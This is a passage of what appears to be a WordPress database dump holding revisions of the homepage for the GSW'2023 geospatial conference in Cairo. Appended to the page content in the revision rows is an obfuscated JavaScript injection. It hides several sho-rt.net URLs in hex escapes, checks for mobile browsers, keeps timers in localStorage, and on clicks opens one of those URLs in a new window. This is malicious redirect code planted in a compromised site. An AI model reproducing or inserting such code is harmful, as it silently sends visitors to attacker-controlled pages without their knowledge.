_0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-09 15:12:20','2022-11-09 15:12:20','',3066,'https://gsw2023.com/?p=3132',0,'revision','',0),
(3133,1,'2022-11-09 15:14:06','2022-11-09 15:14:06','[vc_row][vc_column width=\"1/2\"][vc_column_text]\r\n<h3></h3>\r\n<h3>EGYPT GSW\'2023</h3>\r\n<h3>The First Geospatial Week in Africa and The Middle East</h3>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005291201{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"right\"][/vc_column_inner][vc_column_inner width=\"3/4\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#3724e5\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1667948825977{margin-top: 25px !important;}\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n[/vc_column_text][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3082\" img_size=\"799x452\"][/vc_column][/vc_row][vc_row][vc_column awb_type=\"image\" awb_stretch=\"1\" awb_image_background_size=\"pattern\" awb_image_background_position=\"0% 50%\" awb_color=\"#1e73be\" awb_image=\"2275\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"5\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^1900|url^https://gsw2023.com/wp-content/uploads/2018/06/trade10.jpg|caption^null|alt^null|title^trade10|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][vc_column][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#311b92\" tick_col=\"#ffffff\" tick_sep_col=\"#eeee22\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#eeee22\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-09 15:14:06','2022-11-09 15:14:06','',3066,'https://gsw2023.com/?p=3133',0,'revision','',0),
(3134,1,'2022-11-09 15:15:09','2022-11-09 15:15:09','[vc_row][vc_column width=\"1/2\"][vc_column_text]\r\n<h3></h3>\r\n<h3>EGYPT GSW\'2023</h3>\r\n<h3>The First Geospatial Week in Africa and The Middle East</h3>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005291201{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"right\"][/vc_column_inner][vc_column_inner width=\"3/4\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#3724e5\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1667948825977{margin-top: 25px !important;}\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT 